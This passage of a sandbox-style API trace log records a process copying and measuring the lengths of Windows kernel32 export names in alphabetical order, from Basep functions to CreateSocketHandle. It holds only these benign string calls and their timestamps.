returned="Basep8BitStringToDynamicUnicodeString" [0178.253] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.253] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.253] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.253] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.253] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.253] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.253] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.253] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.253] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.253] lstrlenA (lpString="BEEP") returned 4 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.255] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.255] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.255] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.255] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.255] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.255] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.255] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.255] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.255] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.255] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.255] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.255] lstrlenA (lpString="CANCELIO") returned 8 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.255] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.255] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.255] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.255] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.256] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.256] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.256] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.256] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.256] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.256] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.256] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.256] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.256] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.256] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.256] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.256] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.256] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.256] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.256] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.256] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.256] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.256] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.256] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.256] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.257] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.257] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.257] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.257] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.257] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.257] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.257] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.257] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.257] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.257] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.257] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.257] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.257] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.257] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.257] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.257] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.257] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.257] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.257] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.258] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.258] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.258] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.258] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.258] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.258] lstrlenA (lpString="COPYFILEA") returned 9 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.258] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.258] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.258] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.258] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.258] lstrlenA (lpString="COPYFILEW") returned 9 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.258] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.258] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.258] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.258] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.258] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.258] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.258] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.258] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.258] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.258] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.259] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.259] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.259] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.259] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.259] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.259] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.259] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.259] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.259] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.259] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.259] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.259] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.259] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.259] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.259] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.259] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.259] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.259] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.259] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.259] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.260] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.260] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.260] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.260] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.260] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.260] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.260] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.260] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.260] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.260] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.260] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.260] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.260] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.260] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.260] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.260] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.260] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.260] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.260] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.261] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.261] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.261] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.261] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.261] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.261] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.261] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.261] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.261] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.261] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.261] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.261] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.261] lstrcpyA (in: lpString1=0x239e328, lpString2="CreateSymbolicLinkA" | out: 